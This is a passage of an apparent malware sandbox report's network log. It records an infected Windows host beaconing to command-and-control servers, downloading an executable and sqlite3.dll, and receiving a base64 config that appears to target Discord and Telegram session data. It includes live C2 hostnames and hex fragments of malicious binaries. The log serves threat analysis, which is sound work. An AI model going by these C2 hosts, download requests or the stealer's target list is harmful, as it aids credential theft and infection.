                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        36192.168.2.3498095.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:17.806499958 CET9520OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://hxktrih.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 264
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:17.920366049 CET10352INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:17 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        37192.168.2.3498105.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:18.013812065 CET10352OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://plxyaqocf.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 369
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:18.127852917 CET10353INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:18 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        38192.168.2.3498115.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:18.221992970 CET10354OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://kpbmili.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 218
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:18.334575891 CET10355INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:18 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 2bI:82OI<\FF2K90


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        39192.168.2.349812185.7.214.1718080C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:18.402061939 CET10355OUTGET /6.php HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: 185.7.214.171:8080
                                                                                                                                                        Dec 28, 2021 03:23:18.463685036 CET10357INHTTP/1.1 200 OK
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:18 GMT
                                                                                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                        Content-Transfer-Encoding: Binary
                                                                                                                                                        Content-disposition: attachment; filename="oryjooylh7ri.exe"
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Data Raw: 34 35 63 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 24 25 2c c5 45 4b 7f c5 45 4b 7f c5 45 4b 7f db 17 cf 7f de 45 4b 7f db 17 de 7f de 45 4b 7f db 17 c8 7f a6 45 4b 7f e2 83 30 7f c0 45 4b 7f c5 45 4a 7f bc 45 4b 7f db 17 c1 7f c4 45 4b 7f db 17 df 7f c4 45 4b 7f db 17 da 7f c4 45 4b 7f 52 69 63 68 c5 45 4b 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f6 0b 2a 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 b0 00 00 00 c4 42 00 00 00 00 00 ff 1a 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 43 00 00 04 00 00 6a 46 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 57 03 00 3c 00 00 00 00 70 42 00 80 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 c1 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 53 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 ae 00 00 00 10 00 00 00 b0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f4 9e 02 00 00 c0 00 00 00 a0 02 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 f6 3e 00 00 60 03 00 00 16 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 75 70 69 00 00 00 72 02 00 00 00 60 42 00 00 04 00 00 00 6a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 ed 00 00 00 70 42 00 00 ee 00 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: 45c00MZ@!L!This program cannot be run in DOS mode.$$%,EKEKEKEKEKEK0EKEJEKEKEKEKRichEKPEL*_B@`CjFW<pBpS@H.textp `.rdata@@.data`>`T@.zupir`Bj@@.rsrcpBn@@


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        4192.168.2.349861104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        40192.168.2.3498135.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:20.566394091 CET10651OUTGET /tratata.php HTTP/1.1
                                                                                                                                                        Host: file-file-host4.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Dec 28, 2021 03:23:20.677841902 CET10652INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.2
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:20 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=n6c9ok5pr9f3mq8uid55nirqfv; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        Data Raw: 63 34 0d 0a 4d 58 77 78 66 44 46 38 4d 58 78 45 61 58 4e 6a 62 33 4a 6b 66 44 42 38 4a 55 46 51 55 45 52 42 56 45 45 6c 58 47 52 70 63 32 4e 76 63 6d 52 63 54 47 39 6a 59 57 77 67 55 33 52 76 63 6d 46 6e 5a 56 78 38 4b 6e 77 78 66 44 42 38 4d 48 78 55 5a 57 78 6c 5a 33 4a 68 62 58 77 77 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 55 5a 57 78 6c 5a 33 4a 68 62 53 42 45 5a 58 4e 72 64 47 39 77 58 48 52 6b 59 58 52 68 58 48 77 71 52 44 67 33 4e 30 59 33 4f 44 4e 45 4e 55 51 7a 52 55 59 34 51 79 6f 73 4b 6d 31 68 63 43 6f 73 4b 6d 4e 76 62 6d 5a 70 5a 33 4d 71 66 44 46 38 4d 48 77 77 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: c4MXwxfDF8MXxEaXNjb3JkfDB8JUFQUERBVEElXGRpc2NvcmRcTG9jYWwgU3RvcmFnZVx8KnwxfDB8MHxUZWxlZ3JhbXwwfCVBUFBEQVRBJVxUZWxlZ3JhbSBEZXNrdG9wXHRkYXRhXHwqRDg3N0Y3ODNENUQzRUY4QyosKm1hcCosKmNvbmZpZ3MqfDF8MHwwfA==0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        41192.168.2.3498145.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:20.789556026 CET10653OUTGET /sqlite3.dll HTTP/1.1
                                                                                                                                                        Host: file-file-host4.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: PHPSESSID=n6c9ok5pr9f3mq8uid55nirqfv
                                                                                                                                                        Dec 28, 2021 03:23:20.890549898 CET10654INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.2
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:20 GMT
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Content-Length: 645592
                                                                                                                                                        Connection: close
                                                                                                                                                        Last-Modified: Wed, 08 Dec 2021 03:32:46 GMT
                                                                                                                                                        ETag: "9d9d8-5d29a24b21380"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 30 32 00 00 00 00 0d 01 00 00 00 e0 08 00 00 02 00 00 00 58 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 31 33 00 00 00 00 db 19 00 00 00 f0 08 00 00 1a 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        42192.168.2.3498155.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:22.212629080 CET11336OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ucoqtvyd.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 171
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:22.329715014 CET11337INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        43192.168.2.3498165.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:22.546894073 CET11338OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://pvmkcaiq.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 175
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:22.666906118 CET11339INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        44192.168.2.3498175.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:23.469065905 CET11340OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
